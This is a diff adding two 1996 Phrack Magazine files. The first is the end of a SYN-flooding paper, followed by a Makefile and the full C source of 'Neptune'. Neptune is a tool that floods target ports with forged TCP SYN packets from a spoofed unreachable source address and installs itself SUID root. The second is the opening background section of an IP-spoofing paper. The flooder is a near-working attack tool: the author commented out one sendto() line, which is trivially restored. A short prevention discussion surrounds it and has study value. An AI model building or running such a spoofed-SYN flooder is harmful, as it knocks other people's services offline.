+4		Enter port number to flood
+	
+The target port to flood.  There is an infinity switch.
+
+5		Enter number of SYNs
+	
+The number of SYNs to send.  Remember, this attack is not bandwidth hungry, 
+sending more packets than neccessary is totally useless.
+
+6		Quit
+	
+Bye, bye.
+
+7		Lanuch
+	
+Fire when ready.
+
+8		Daemonize (may or may not be implemented in yur version)
+
+Puts the program in dameon mode.  It forks to the background and does it's 
+evilness there.  Needs two more options:  packet sending interval, and time 
+for daemon to live.  Recommended packet sending interval is at least every
+90 seconds, depending on the target TCP.  80 should work fine, as the 
+connection establishment timer is 75 seconds.  Daemon lifetime is up to you.
+Be kind.  
+	Also the daemon portion includes routines to optionally make use
+of a file of unreachable IP addresses and (pseudo) randomly choose from 
+them.  The program reads the file and builds a dynamic array of these IP
+addresses in network byte order and then uses rand (seeded from the time of
+day in seconds --we don't need alot of entropy here, this isn't 
+cryptography--) to generate a number and then it mods that number by the 
+number of entries in the table to hash to a particular IP address. 
+
+	Since the program opens raw sockets, it needs to run as root.  By
+default, it is installed SUID root in /usr/local/bin/neptune with the access
+list in /etc/sfaccess.conf.  The authentication mechanism works by checking 
+the usernames (via UID) of the attempted flooders.  It is not a complex 
+algorithm, and in fact the code is quite simple (asside:  If anyone can find 
+any security problems with the program being SUID root, --above the fact 
+that the program is admittedly evil-- I would love to hear about them).  Root 
+is the only entry the access file starts off with.
+	For the program to work, you need to remove the comment marks from 
+line 318 (the actual sendto() call where the forged datagrams are sent).  I 
+did that so the fools simply interested in causing trouble (and not interested
+in learning) would find the program mostly useless.
+
+
+
+		Section VII.	Discussion and Prevention
+
+
+
+	As we have seen, the attack works because TCP is attempting to do it's
+job of providing a reliable transport.  TCP must establish a connection first,
+and this is where the weakness lies.  (T/TCP is immune to this attack via TAO.
+See my future paper: `The Next Generation Internet` for information on T/TCP
+and IPng.)  Under normal circumstances, assuming well-behaved networking 
+software, the worst that can happen is a TCP-based server may be wrapped up in 
+legimate connection-establishment processing and a few clients may have to 
+retransmit thier SYNs.  But, a misbegotten client program can exploit this 
+connection-establishment weakness and down a TCP-based server with only a few
+doctored segments.  
+	The fact that SYN flooding requires such a small amount of network 
+traffic to be so effective is important to note.  Consider other network
+DOS attacks such as ICMP_ECHO floods (ping floods), mail bombs, mass mailing 
+list subscriptions, etc...  To be effective, all of these attacks require 
+an attacker to transmit volumous amounts of network traffic.  Not only does
+this make these attacks more noticable on both ends by decreasing the amount 
+of available bandwidth (as such, often these attacks are waged from compromised 
+machines) but it also adds to the general traffic problems of the Internet.
+SYN flooding can be deadly effective with as little as 360 packets/hour.
+	
+
+		--[ Prevention ]--
+
+
+	Ok, so how do we stop it?  Good question.  
+
+
+		--[ TCPd ]--
+
+
+	TCP wrappers are almost useless.  The magic they do is based on the 
+validity of the source IP-address of incoming datagrams.  As we know, this can
+be spoofed to whatever the attacker desires.  Unless the target has denied 
+traffic from *everywhere* except known hosts, TCP wrappers will not save you.
+
+
+		--[ Increase the Backlog ]--
+
+
+	Increasing the default backlog is not much of a solution.  In 
+comparision with the difficulty of an attacker simply sending more packets,
+the memory requirements of the additional connection-establishment structures
+is prohibitively expensive.  At best it is an obfuscative (word check...?)
+measure.
+
+
+		--[ Packet Filtering ]--
+		
+
+	A smart packet filter (or kernel modification) of some kind may be 
+a viable solution.  Briefly:
+
+- Host keeps a recent log of incoming packets with the `SYN` bit on in a 
+linked list structure.
+- The linked list cannot be permitted to grow without bound (another DOS
+attack would present itself)
+- When x amount of SYNs are received on a socket, certain characteristics
+about the packets are compared, (Source port, source IP address, sequence
+numbers, window size, etc) and if things seem fishy, the connection
+requests and associated memory structures are immediately destroyed.
+
+
+
+		Section VIII.	References
+
+
+
+		Ppl:	A. Cox, R. Stevens
+		Books:	TCP Illustrated vols II,III
+		
+
+
+This project made possible by a grant from the Guild Corporation.
+
+EOF
+
+
+------------------------8<--------------------------------------------
+
+
+# Neptune Makefile
+# daemon9, 1996 Guild Productions
+
+all:
+	@gcc -o neptune neptune.c
+	@echo ""
+	@echo "'make install' will install the program..."
+	@echo ""
+	@echo "Warning!  Neptune is installed SUID root by default!"
+	@echo ""
+	@echo "route@infonexus.com / Guild Corporation"
+install:
+	strip ./neptune
+	mv ./neptune /usr/local/bin/neptune
+	chmod 4755 /usr/local/bin/neptune
+	@echo "root" > /etc/sfaccess.conf
+	@echo "Installation complete, access list is /etc/sfaccess.conf"
+clean: 
+	@rm -f *.o neptune /etc/sfaccess.conf
+
+
+------------------------8<--------------------------------------------
+
+
+/*
+			        Neptune
+			        v. 1.5
+
+			daemon9/route/infinity
+
+		      June 1996 Guild productions
+
+	             comments to daemon9@netcom.com
+	
+	If you found this code alone, without the companion whitepaper
+	please get the real-deal:
+ftp.infonexus.com/pub/SourceAndShell/Guild/Route/Projects/Neptune/neptune.tgz
+	
+Brief synopsis:
+	Floods the target host with TCP segments with the SYN bit on,
+	puportedly from an unreachable host.  The return address in the 
+	IP header is forged to be that of a known unreachable host.  The
+	attacked TCP, if flooded sufficently, will be unable to respond
+	to futher connects.  See the accompanying whitepaper for a full 
+	treatment of the topic.  (Also see my paper on IP-spoofing for
+	information on a related subject.)
+
+Usage:
+	Figure it out, kid.  Menu is default action.  Command line usage is
+	available for easy integration into shell scripts.  If you can't
+	figure out an unreachable host, the program will not work.
+
+Gripes: 
+	It would appear that flooding a host on every port (with the 
+	infinity switch) has it's drawbacks.  So many packets are trying to 
+	make their way to the target host, it seems as though many are 
+	dropped, especially on ethernets.  Across the Internet, though, the 
+	problem appears mostly mitigated.  The call to usleep appears to fix 
+	this...  Coming up is a port scanning option that will find open 
+	ports...
+
+Version History:
+6/17/96 beta1:	SYN flooding, Cmd line and crude menu, ICMP stuff broken
+6/20/96	beta2:	Better menu, improved SYN flooding, ICMP fixed... sorta
+6/21/96	beta3:	Better menu still, fixed SYN flood clogging problem
+		Fixed some name-lookup problems
+6/22/96	beta4:	Some loop optimization, ICMP socket stuff changed, ICMP
+		code fixed
+6/23/96 1.0:	First real version...
+6/25/96	1.1:	Cleaned up some stuff, added authentication hooks, fixed up
+		input routine stuff
+7/01/96	1.5:	Added daemonizing routine...
+
+   This coding project made possible by a grant from the Guild corporation
+
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <syslog.h>
+#include <pwd.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <time.h>
+#include <linux/signal.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <linux/icmp.h>
+
+#define BUFLEN 256
+#define MENUBUF	64
+#define MAXPORT 1024
+#define	MAXPAK 4096		
+#define	MENUSLEEP 700000 	
+#define	FLOODSLEEP 100		/* Ethernet, or WAN? Yur mileage will vary.*/
+#define	ICMPSLEEP 100		
+#define ACCESSLIST "/etc/sfaccess.conf"
+
+int HANDLERCODE=1;
+int KEEPQUIET=0;
+char werd[]={"\nThis code made possible by a grant from the Guild Corporation\n\0"};
+ 
+void main(argc,argv)
+int argc;
+char *argv[];
+{
+	
+	void usage(char *);
+	void menu(int,char *);
+	void flood(int,unsigned,unsigned,u_short,int);
+	unsigned nameResolve(char *);
+	int authenticate(int,char *);	
+ 
+	unsigned unreachable,target;	
+	int c,port,amount,sock1,fd;
+	struct passwd *passEnt;
+	char t[20],u[20];
+
+	if((fd=open(ACCESSLIST,O_RDONLY))<=0){
+		perror("Cannot open accesslist");
+		exit(1);
+	}
+	setpwent();
+	passEnt=getpwuid(getuid());
+	endpwent();
+				/* Authenticate */
+	if(!authenticate(fd,passEnt->pw_name)){
+		fprintf(stderr,"Access Denied, kid\n");
+		exit(0);
+	}
+				/* Open up a RAW socket */
+
+   	if((sock1=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
+   		perror("\nHmmm.... socket problems\n");
+      		exit(1);
+   	} 
+	if(argc==1){
+		menu(sock1,passEnt->pw_name);
+		exit(0);
+	}
+				/* Parse command-line arguments */
+	while((c=getopt(argc,argv,"8:s:t:p:a"))){
+      		switch(c){
+			case 's':	/* Source (spoofed) host */
+				unreachable=nameResolve(optarg);
+				strcpy(u,optarg);
+				break;
+			case 't':	/* Target host */
+			 	target=nameResolve(optarg);
+				strcpy(t,optarg);
+				break;
+			case 'p':	/* Target port */
+				port=atoi(optarg);
+				break;
+        		case '8':	/* infinity switch */
+				port=0;			
+				break;
+			case 'a':	/* Amount of SYNs to send */
+				amount=atoi(optarg);
+				break;
+        		default:	/* WTF? */
+          			usage(argv[0]);
+		}
+	}    
+
+	if(!port){
+		printf("\n\nFlooding target: \t\t%u\nOn ports\t\t\t1-%d\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,MAXPORT,amount,unreachable); 
+	  	flood(sock1,unreachable,target,0,amount);
+	}	
+	else{
+		printf("\n\nFlooding target: \t\t%u\nOn port: \t\t\t%u\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,port,amount,unreachable); 
+   		flood(sock1,unreachable,target,port,amount);
+	}
+	syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),passEnt->pw_name,t,u,port,amount);  
+	printf(werd);
+	exit(0);
+}					/* End main */
+
+/*
+ * 	Authenticate.  Makes sure user is authorized to run program.
+ *
+ */
+int authenticate(fd,nameID)
+int fd;
+char *nameID;
+{
+
+	char buf[BUFLEN+1];
+	char workBuffer[10];
+	int i=0,j=0;	
+
+	while(read(fd,buf,sizeof(buf))){
+		if(!(strstr(buf,nameID))){
+			close(fd);
+			syslog(LOG_LOCAL6|LOG_INFO,"Failed authentication for %s\n",nameID);  
+			return(0);
+		}
+		else {
+			close(fd);
+			syslog(LOG_LOCAL6|LOG_INFO,"Successful start by %s, PID: %d\n",nameID,getpid());  
+			return(1);
+		}
+	}
+}
+
+
+/*
+ *	Flood.  This is main workhorse of the program.  IP and TCP header 
+ *	construction occurs here, as does flooding.	
+ */
+void flood(int sock,unsigned sadd,unsigned dadd,u_short dport,int amount){
+ 
+	unsigned short in_cksum(unsigned short *,int);
+  
+   	struct packet{
+      		struct iphdr ip;
+      		struct tcphdr tcp;
+   	}packet;
+   
+	struct pseudo_header{		/* For TCP header checksum */
+      		unsigned int source_address;
+      		unsigned int dest_address;
+      		unsigned char placeholder;
+      		unsigned char protocol;
+      		unsigned short tcp_length;
+      		struct tcphdr tcp;
+   	}pseudo_header;
+ 
+   	struct sockaddr_in sin;		/* IP address information */
+   	register int i=0,j=0;		/* Counters */
+	int tsunami=0;			/* flag */
+	unsigned short sport=161+getpid();
+
+	if(!dport){
+		tsunami++;		/* GOD save them... */
+		fprintf(stderr,"\nTSUNAMI!\n");
+		fprintf(stderr,"\nflooding port:");	
+	}
+
+   			/* Setup the sin struct with addressing information */
+
+   	sin.sin_family=AF_INET;		/* Internet address family */
+   	sin.sin_port=sport;		/* Source port */
+   	sin.sin_addr.s_addr=dadd;	/* Dest. address */
+    			
+			/* Packet assembly begins here */
+
+   				/* Fill in all the TCP header information */
+
+   	packet.tcp.source=sport;	/* 16-bit Source port number */
+   	packet.tcp.dest=htons(dport); 	/* 16-bit Destination port */
+   	packet.tcp.seq=49358353+getpid();	/* 32-bit Sequence Number */
+   	packet.tcp.ack_seq=0;		/* 32-bit Acknowledgement Number */
+   	packet.tcp.doff=5;		/* Data offset */
+	packet.tcp.res1=0;		/* reserved */
+	packet.tcp.res2=0;		/* reserved */	
+   	packet.tcp.urg=0;		/* Urgent offset valid flag */		
+   	packet.tcp.ack=0;		/* Acknowledgement field valid flag */
+   	packet.tcp.psh=0;		/* Push flag */
+   	packet.tcp.rst=0;		/* Reset flag */
+   	packet.tcp.syn=1;		/* Synchronize sequence numbers flag */
+   	packet.tcp.fin=0;		/* Finish sending flag */
+   	packet.tcp.window=htons(242); /* 16-bit Window size */
+   	packet.tcp.check=0;		/* 16-bit checksum (to be filled in below) */
+   	packet.tcp.urg_ptr=0;		/* 16-bit urgent offset */
+ 
+   				/* Fill in all the IP header information */
+   
+   	packet.ip.version=4;		/* 4-bit Version */
+	packet.ip.ihl=5;		/* 4-bit Header Length */
+   	packet.ip.tos=0;		/* 8-bit Type of service */
+   	packet.ip.tot_len=htons(40);	/* 16-bit Total length */
+   	packet.ip.id=getpid();		/* 16-bit ID field */
+   	packet.ip.frag_off=0;		/* 13-bit Fragment offset */
+   	packet.ip.ttl=255;		/* 8-bit Time To Live */
+   	packet.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
+   	packet.ip.check=0;		/* 16-bit Header checksum (filled in below) */
+   	packet.ip.saddr=sadd;		/* 32-bit Source Address */
+   	packet.ip.daddr=dadd;		/* 32-bit Destination Address */
+ 
+			/* Psuedo-headers needed for TCP hdr checksum (they
+			do not change and do not need to be in the loop) */
+      		
+	pseudo_header.source_address=packet.ip.saddr;
+      	pseudo_header.dest_address=packet.ip.daddr;
+      	pseudo_header.placeholder=0;
+      	pseudo_header.protocol=IPPROTO_TCP;
+      	pseudo_header.tcp_length=htons(20);
+ 
+	while(1){			/* Main loop */
+		if(tsunami){
+			if(j==MAXPORT){
+				tsunami=0;
+	  			break;
+			}
+			packet.tcp.dest=htons(++j);
+			fprintf(stderr,"%d",j);
+			fprintf(stderr,"%c",0x08);
+			if(j>=10)fprintf(stderr,"%c",0x08);
+			if(j>=100)fprintf(stderr,"%c",0x08);
+			if(j>=1000)fprintf(stderr,"%c",0x08);
+			if(j>=10000)fprintf(stderr,"%c",0x08);
+
+		}
+   		for(i=0;i<amount;i++){	/* Flood loop */
+
+				/* Certian header fields should change */	
+
+      			packet.tcp.source++;	/* Source port inc */
+      			packet.tcp.seq++;	/* Sequence Number inc */
+      			packet.tcp.check=0;	/* Checksum will need to change */
+      			packet.ip.id++;		/* ID number */
+      			packet.ip.check=0;	/* Checksum will need to change */
+ 
+      			/* IP header checksum */
+      	
+			packet.ip.check=in_cksum((unsigned short *)&packet.ip,20);
+ 
+			/* Setup TCP headers for checksum */
+
+      			bcopy((char *)&packet.tcp,(char *)&pseudo_header.tcp,20);
+
+			/* TCP header checksum */
+
+      			packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,32);
+
+			/* As it turns out, if we blast packets too fast, many
+		 	get dropped, as the receiving kernel can't cope (at 
+			least on an ethernet).  This value could be tweaked
+			prolly, but that's up to you for now... */
+		
+			usleep(FLOODSLEEP);  
+		
+		/* This is where we sit back and watch it all come together */
+      		
+			/*sendto(sock,&packet,40,0,(struct sockaddr *)&sin,sizeof(sin));*/
+			if(!tsunami&&!KEEPQUIET)fprintf(stderr,".");
+   		}	
+		if(!tsunami)break;
+	}
+}
+ 
+
+/*
+ *	IP Family checksum routine (from UNP)
+ */
+unsigned short in_cksum(unsigned short *ptr,int nbytes){
+
+	register long           sum;            /* assumes long == 32 bits */
+        u_short                 oddbyte;
+        register u_short        answer;         /* assumes u_short == 16 bits */
+ 
+        /*
+         * Our algorithm is simple, using a 32-bit accumulator (sum),
+         * we add sequential 16-bit words to it, and at the end, fold back
+         * all the carry bits from the top 16 bits into the lower 16 bits.
+         */
+ 
+        sum = 0;
+        while (nbytes > 1)  {
+                sum += *ptr++;
+                nbytes -= 2;
+        }
+ 
+                                /* mop up an odd byte, if necessary */
+        if (nbytes == 1) {
+                oddbyte = 0;            /* make sure top half is zero */
+                *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
+                sum += oddbyte;
+        }
+ 
+        /*
+         * Add back carry outs from top 16 bits to low 16 bits.
+         */
+ 
+        sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
+        sum += (sum >> 16);                     /* add carry */
+        answer = ~sum;          /* ones-complement, then truncate to 16 bits */
+        return(answer);
+}
+
+
+/*
+ *	Converts IP addresses
+ */
+unsigned nameResolve(char *hostname){
+
+	struct in_addr addr;
+   	struct hostent *hostEnt;
+
+   	if((addr.s_addr=inet_addr(hostname))==-1){
+     		if(!(hostEnt=gethostbyname(hostname))){
+         		fprintf(stderr,"Name lookup failure: `%s`\n",hostname);
+         		exit(0);
+      		}
+      		bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
+   	}
+   	return addr.s_addr;
+}
+
+
+/*
+ *	Menu function.  Nothing suprising here.  Except that one thing.
+ */
+void menu(sock1,nameID)
+int sock1;
+char *nameID;
+{
+	int slickPing(int,int,char *);
+	void flood(int,unsigned,unsigned,u_short,int);
+	unsigned nameResolve(char *);
+	void demon(int,char *,char *,int,int,int,int);
+
+	int i,sock2,menuLoop=1,icmpAmt,port,amount,interval,ttl;
+	char optflags[7]={0};		/* So we can keep track of the options */
+	static char tmp[MENUBUF+1]={0},target[MENUBUF+1]={0},unreach[MENUBUF+1]={0};	
+
+	while(menuLoop){		
+		printf("\n\n\t\t\t[   SYNflood Menu   ]\n\t\t\t    [  daemon9  ]\n\n");
+		if(!optflags[0])printf("1\t\tEnter target host\n");
+		else printf("[1]\t\tTarget:\t\t\t%s\n",target);
+		if(!optflags[1])printf("2\t\tEnter source (unreachable) host\n");
+		else printf("[2]\t\tUnreachable:\t\t%s\n",unreach);
+		if(!optflags[2])printf("3\t\tSend ICMP_ECHO(s) to unreachable\n");
+		else printf("[3]\t\tUnreachable host:\tverified unreachable\n");
+		if(!optflags[3])printf("4\t\tEnter port number to flood\n");
+		else if(port)printf("[4]\t\tFlooding:\t\t%d\n",port);
+		else printf("[4]\t\tFlooding:\t\t1-1024\n");
+		if(!optflags[4])printf("5\t\tEnter number of SYNs\n");
+		else printf("[5]\t\tNumber SYNs:\t\t%d\n",amount);
+		printf("\n6\t\tQuit\n");
+		if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4])printf("7\t\tLaunch Attack\n");
+		if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4])printf("8\t\tDaemonize\n");
+		printf("\n\n\n\n\n\n\n\n\n\n\n\n");
+		fgets(tmp,BUFLEN/2,stdin);	/* tempered input */
+		switch(atoi(tmp)){
+			case 1:	
+				printf("[hostname]-> ");
+				fgets(target,MENUBUF,stdin);
+				i=0;
+				if(target[0]=='\n')break;
+				while(target[i]!='\n')i++;
+				target[i]=0;
+				optflags[0]=1;			
+				break;
+			case 2:
+				printf("[hostname]-> ");
+				fgets(unreach,MENUBUF,stdin);
+				i=0;
+				if(unreach[0]=='\n')break;
+				while(unreach[i]!='\n')i++;
+				unreach[i]=0;
+				optflags[1]=1;
+				break;
+			case 3:
+				if(!optflags[1]){
+					fprintf(stderr,"Um, enter a host first\n");
+					usleep(MENUSLEEP);
+					break;
+				}
+						/* Raw ICMP socket */
+   				if((sock2=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){
+   					perror("\nHmmm.... socket problems\n");
+      					exit(1);
+   				}		
+				printf("[number of ICMP_ECHO's]-> ");
+				fgets(tmp,MENUBUF,stdin);
+				if(!(icmpAmt=atoi(tmp)))break;
+				if(slickPing(icmpAmt,sock2,unreach)){
+					fprintf(stderr,"Host is reachable... Pick a new one\n");
+					sleep(1);
+					optflags[1]=0;
+					optflags[2]=0;
+					HANDLERCODE=1;
+					close(sock2);
+					break;
+				}
+				optflags[2]=1;
+				close(sock2);
+				break;
+			case 4: 
+				printf("[port number]-> ");
+				fgets(tmp,MENUBUF,stdin);
+				port=atoi(tmp);
+				optflags[3]=1;
+				break;
+			case 5:
+				printf("[number of SYNs]-> ");
+				fgets(tmp,MENUBUF,stdin);
+				if(!(amount=atoi(tmp)))break;
+				optflags[4]=1;
+				break;
+			case 6:
+				menuLoop--;
+				break;
+			case 7:
+				if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]){
+					syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),nameID,target,unreach,port,amount);  
+					flood(sock1,nameResolve(unreach),nameResolve(target),port,amount);
+					menuLoop--;
+				}
+				else{
+					fprintf(stderr,"Illegal option --try again\n");
+					usleep(MENUSLEEP);
+				}
+				break;
+			case 8:
+				if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]){
+					if(!port){
+						fprintf(stderr,"Cannot set infinity flag in daemon mode.  Sorry.\n");
+						usleep(MENUSLEEP*2);
+						break;
+					}
+					printf("[packet sending interval in seconds {80}]-> ");
+					fgets(tmp,MENUBUF,stdin);
+					if(!(interval=atoi(tmp)))interval=80;
+					printf("[time for daemon to live in whole hours(0=forever)]-> ");
+					fgets(tmp,MENUBUF,stdin);
+					ttl=atoi(tmp);
+					syslog(LOG_LOCAL6|LOG_INFO,"DFLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d Interval: %d TTL: %d\n",getpid(),nameID,target,unreach,port,amount,interval,ttl);  
+					demon(sock1,unreach,target,port,amount,interval,ttl);
+					exit(0);
+				}
+				else{
+					fprintf(stderr,"Illegal option --try again\n");
+					usleep(MENUSLEEP);
+				}
+				break;
+								
+			default:
+				fprintf(stderr,"Illegal option --try again\n");
+				usleep(MENUSLEEP);
+		}
+
+	}
+	printf("\n");
+	printf(werd);
+	return;
+}
+
+
+/*
+ *	SlickPing.  A quick and dirty ping hack.  Sends <amount> ICMP_ECHO 
+ *	packets and waits for a reply on any one of them...  It has to check 
+ *	to make sure the ICMP_ECHOREPLY is actually meant for us, as raw ICMP 
+ *	sockets get ALL the ICMP traffic on a host, and someone could be 
+ *	pinging some other host and we could get that ECHOREPLY and foul 
+ *	things up for us.
+ */
+int slickPing(amount,sock,dest)
+int amount,sock;
+char *dest;
+{
+
+	int alarmHandler();
+	unsigned nameResolve(char *);
+	
+	register int retcode,j=0;
+	struct icmphdr *icmp;
+	struct sockaddr_in sin;
+	unsigned char sendICMPpak[MAXPAK]={0};
+	unsigned short pakID=getpid()&0xffff;
+
+	struct ippkt{
+   		struct iphdr ip;
+   		struct icmphdr icmp;
+   		char buffer[MAXPAK];
+	}pkt;
+
+	bzero((char *)&sin,sizeof(sin));
+	sin.sin_family=AF_INET;
+	sin.sin_addr.s_addr=nameResolve(dest);
+
+		/* ICMP Packet assembly  */
+	/* We let the kernel create our IP header as it is legit */
+
+	icmp=(struct icmphdr *)sendICMPpak;
+	icmp->type=ICMP_ECHO;			/* Requesting an Echo */
+	icmp->code=0;				/* 0 for ICMP ECHO/ECHO_REPLY */
+	icmp->un.echo.id=pakID;			/* To identify upon return */	
+	icmp->un.echo.sequence=0;		/* Not used for us */
+	icmp->checksum=in_cksum((unsigned short *)icmp,64);
+
+	fprintf(stderr,"sending ICMP_ECHO packets: ");
+	for(;j<amount;j++){
+		usleep(ICMPSLEEP);		/* For good measure */
+		retcode=sendto(sock,sendICMPpak,64,0,(struct sockaddr *)&sin,sizeof(sin));
+		if(retcode<0||retcode!=64)
+			if(retcode<0){
+				perror("ICMP sendto err");
+				exit(1);
+			}
+			else fprintf(stderr,"Only wrote %d bytes",retcode);
+		else fprintf(stderr,".");
+	}
+	HANDLERCODE=1;
+	signal(SIGALRM,alarmHandler);	/* catch the ALARM and handle it */
+	fprintf(stderr,"\nSetting alarm timeout for 10 seconds...\n");
+	alarm(10);	/* ALARM is set b/c read() will block forever if no */
+	while(1){	/* packets arrive...   (which is what we want....)  */
+		read(sock,(struct ippkt *)&pkt,MAXPAK-1);
+  		if(pkt.icmp.type==ICMP_ECHOREPLY&&icmp->un.echo.id==pakID){
+			if(!HANDLERCODE)return(0);
+			return(1);
+		}
+  	}	
+}
+
+
+/* 
+ *	SIGALRM signal handler.  Souper simple.
+ */ 
+int alarmHandler(){
+
+	HANDLERCODE=0;		/* shame on me for using global vars */
+	alarm(0);
+	signal(SIGALRM,SIG_DFL);
+	return(0);
+}
+
+
+/*
+ *	Usage function...  
+ */
+void usage(nomenclature)
+char *nomenclature;
+{
+	fprintf(stderr,"\n\nUSAGE: %s \n\t-s unreachable_host \n\t-t target_host \n\t-p port [-8 (infinity switch)] \n\t-a amount_of_SYNs\n",nomenclature);
+      	exit(0);
+}
+
+
+/*
+ *	Demon.  Backgrounding procedure and looping stuff.  
+ */					
+
+void demon(sock,unreachable,target,port,amount,interval,ttl)
+int sock;
+char *unreachable;
+char *target;
+int port;
+int amount;
+int interval;
+int ttl;
+{
+	fprintf(stderr,"\nSorry Daemon mode not available in this version\n");
+	exit(0);
+
+}
+	
diff --git a/phrack48/14.txt b/phrack48/14.txt
new file mode 100644
index 0000000..a5eb95f
--- /dev/null
+++ b/phrack48/14.txt
@@ -0,0 +1,557 @@
+                             ==Phrack Magazine==
+
+             Volume Seven, Issue Forty-Eight, File 14 of 18
+
+
+			 [ IP-spoofing Demystified ]
+		      (Trust-Relationship Exploitation)
+
+
+			by daemon9 / route / infinity
+			     for Phrack Magazine
+		      June 1996 Guild Productions, kid
+
+		       comments to route@infonexus.com
+
+
+        The purpose of this paper is to explain IP-spoofing to the
+masses.  It assumes little more than a working knowledge of Unix and
+TCP/IP.  Oh, and that yur not a moron...
+        IP-spoofing is complex technical attack that is made up of
+several components.  (In actuality, IP-spoofing is not the attack, but
+a step in the attack.  The attack is actually trust-relationship
+exploitation.  However, in this paper,  IP-spoofing will refer to the
+whole attack.)  In this paper, I will explain the attack in detail,
+including the relevant operating system and networking information.
+
+
+                [SECTION I.  BACKGROUND INFORMATION]
+
+
+        --[ The Players ]--
+
+
+        A:      Target host
+        B:      Trusted host
+        X:      Unreachable host
+        Z:      Attacking host
+        (1)2:   Host 1 masquerading as host 2
+
+
+        --[ The Figures ]--
+
+
+        There are several figures in the paper and they are to be
+interpreted as per the following example:
+
+ick   host a      control     host b
+1       A       ---SYN--->      B
+
+tick:   A tick of time.  There is no distinction made as to *how*
+much time passes between ticks, just that time passes.  It's generally
+not a great deal.
+host a: A machine particpating in a TCP-based conversation.
+control: This field shows any relevant control bits set in the TCP
+header and the direction the data is flowing
+host b: A machine particpating in a TCP-based conversation.
+
+In this case, at the first refrenced point in time host a is sending
+a TCP segment to host b with the SYN bit on.  Unless stated, we are
+generally not concerned with the data portion of the TCP segment.
+
+
+        --[ Trust Relationships ]--
+
+
+        In the Unix world, trust can be given all too easily.  Say you
+have an account on machine A, and on machine B.  To facilitate going
+betwixt the two with a minimum amount of hassle, you want to setup a
+full-duplex trust relationship between them.  In your home directory
+at A you create a .rhosts file: `echo "B username" > ~/.rhosts` In
+your home directory at B you create a .rhosts file: `echo "A username"
+> ~/.rhosts` (Alternately, root can setup similar rules in
+/etc/hosts.equiv, the difference being that the rules are hostwide,
+rather than just on an individual basis.)  Now, you can use any of the
+r* commands without that annoying hassle of password authentication.
+These commands will allow address-based authentication, which will
+grant or deny access based off of the IP address of the service
+requestor.
+
+
+        --[ Rlogin ]--
+
+
+        Rlogin is a simple client-server based protocol that uses TCP
+as it's transport.  Rlogin allows a user to login remotely from one
+host to another, and, if the target machine trusts the other, rlogin
+will allow the convienience of not prompting for a password.  It will
+instead have authenticated the client via the source IP address.  So,
+from our example above, we can use rlogin to remotely login to A from
+B (or vice-versa) and not be prompted for a password.
+
+
+        --[ Internet Protocol ]--
+
+
+        IP is the connectionless, unreliable network protocol in the
+TCP/IP suite.  It has two 32-bit header fields to hold address
+information.  IP is also the busiest of all the TCP/IP protocols as
+almost all TCP/IP traffic is encapsulated in IP datagrams.  IP's job
+is to route packets around the network.  It provides no mechanism for
+reliability or accountability, for that, it relies on the upper
+layers.  IP simply sends out datagrams and hopes they make it intact.
+If they don't, IP can try to send an ICMP error message back to the
+source, however this packet can get lost as well.  (ICMP is Internet
+Control Message Protocol and it is used to relay network conditions
+and different errors to IP and the other layers.)  IP has no means to
+guarantee delivery.  Since IP is connectionless, it does not maintain
+any connection state information.  Each IP datagram is sent out without
+regard to the last one or the next one.  This, along with the fact that
+it is trivial to modify the IP stack to allow an arbitrarily choosen IP
+address in the source (and destination) fields make IP easily subvertable.
+
+
+        --[ Transmission Control Protocol ]--
+
+
+        TCP is the connection-oriented, reliable transport protocol
+in the TCP/IP suite.  Connection-oriented simply means that the two
+hosts participating in a discussion must first establish a connection
+before data may change hands.  Reliability is provided in a number of
+ways but the only two we are concerned with are data sequencing and
+acknowledgement.  TCP assigns sequence numbers to every segment and
+acknowledges any and all data segments recieved from the other end.
+(ACK's consume a sequence number, but are not themselves ACK'd.)
+This reliability makes TCP harder to fool than IP.
+
+
+        --[ Sequence Numbers, Acknowledgements and other flags ]--
+
+
+        Since TCP is reliable, it must be able to recover from
+lost, duplicated, or out-of-order data.  By assigning a sequence
+number to every byte transfered, and requiring an acknowledgement from
+the other end upon receipt, TCP can guarantee reliable delivery.  The
+receiving end uses the sequence numbers to ensure proper ordering of
+the data and to eliminate duplicate data bytes.
+        TCP sequence numbers can simply be thought of as 32-bit
+counters.  They range from 0 to 4,294,967,295.  Every byte of
+data exchanged across a TCP connection (along with certain flags)
+is sequenced.  The sequence number field in the TCP header will
+contain the sequence number of the *first* byte of data in the
+TCP segment.  The acknowledgement number field in the TCP header
+holds the value of next *expected* sequence number, and also
+acknowledges *all* data up through this ACK number minus one.
+        TCP uses the concept of window advertisement for flow
+control.  It uses a sliding window to tell the other end how much
+data it can buffer.  Since the window size is 16-bits a receiving TCP
+can advertise up to a maximum of 65535 bytes.  Window advertisement
+can be thought of an advertisment from one TCP to the other of how
+high acceptable sequence numbers can be.
+        Other TCP header flags of note are RST (reset), PSH (push)
+and FIN (finish).  If a RST is received, the connection is
+immediately torn down.  RSTs are normally sent when one end
+receives a segment that just doesn't jive with current connection
+(we will encounter an example below).  The PSH flag tells the
+reciever to pass all the data is has queued to the aplication, as
+soon as possible.  The FIN flag is the way an application begins a
+graceful close of a connection (connection termination is a 4-way
+process). When one end recieves a FIN, it ACKs it, and does not
+expect to receive any more data (sending is still possible, however).
+
+
